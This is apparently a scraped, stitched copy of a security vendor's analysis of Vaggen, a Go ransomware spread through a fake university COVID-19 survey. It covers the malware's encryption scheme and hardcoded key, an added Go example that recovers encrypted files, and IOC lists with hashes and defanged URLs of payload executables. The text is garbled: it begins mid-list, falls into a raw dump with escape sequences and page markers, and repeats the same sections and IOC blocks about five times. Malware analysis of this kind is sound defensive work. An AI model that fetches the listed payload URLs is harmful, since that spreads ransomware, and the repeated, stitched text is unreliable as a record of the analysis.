main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Golang function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode.

The encryption algorithm is similar to the one demonstrated here. It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs
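The file recovery that the Vaggen ransomware section above makes possible, as an added Go example (not the post’s or the malware’s code): it reverses the documented .VAGGEN layout of 12-byte nonce, AES-256-GCM ciphertext and 16-byte tag using the hardcoded key quoted there. The encrypted sample it recovers is constructed in the block itself with a fixed nonce, since the real files draw theirs from CryptGenRandom.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
	"strings"
)

const (
	vaggenNonceSize = 12 // nonce prepended to every .VAGGEN file
	vaggenTagSize   = 16 // GCM authentication tag appended by gcm.Seal
)

// VaggenKey is the hardcoded key quoted in the analysis; it is exactly 32 bytes,
// which is why the cipher is AES-256.
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// RecoverVaggen reverses the layout nonce || ciphertext || tag that a single
// gcm.Seal call produces. gcm.Open verifies the tag, so a truncated or tampered
// file is rejected instead of being "decrypted" to garbage.
func RecoverVaggen(key, blob []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("expected a 32-byte AES-256 key, got %d bytes", len(key))
	}
	if len(blob) < vaggenNonceSize+vaggenTagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // standard 12-byte nonce, 16-byte tag
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:vaggenNonceSize], blob[vaggenNonceSize:]
	plaintext, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("authentication failed (wrong key or corrupted file): %w", err)
	}
	return plaintext, nil
}

// OriginalName strips the .VAGGEN extension the ransomware appends; ok is false
// when the name does not carry it, so unrelated files are left alone.
func OriginalName(name string) (string, bool) {
	if !strings.HasSuffix(name, ".VAGGEN") {
		return name, false
	}
	return strings.TrimSuffix(name, ".VAGGEN"), true
}

// SealVaggenSample builds a constructed test blob in the documented layout so
// RecoverVaggen can be exercised offline; it is sample input, not the malware.
func SealVaggenSample(key, nonce, plaintext []byte) ([]byte, error) {
	if len(nonce) != vaggenNonceSize {
		return nil, fmt.Errorf("nonce must be %d bytes", vaggenNonceSize)
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	out := append([]byte{}, nonce...)          // nonce first ...
	return gcm.Seal(out, nonce, plaintext, nil), nil // ... then ciphertext || tag
}

func main() {
	nonce := []byte("constructed!") // 12 bytes, fixed only for this demonstration
	original := []byte("Constructed sample document body")
	blob, err := SealVaggenSample(VaggenKey, nonce, original)
	if err != nil {
		panic(err)
	}
	recovered, err := RecoverVaggen(VaggenKey, blob)
	if err != nil {
		panic(err)
	}
	name, _ := OriginalName("survey.docx.VAGGEN")
	fmt.Printf("%s recovered intact: %v\n", name, bytes.Equal(recovered, original))
}
```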
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2859 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2860 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2861 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2862 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2863 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2864 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2865 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). 
Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2866 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2867 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2868 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2869 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2870 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2871 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2872 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2873 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2874 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2875 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2876 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2877 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2878 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2879 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2880 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2881 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2882 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2883 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2884 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2885 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2886 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2887 of 
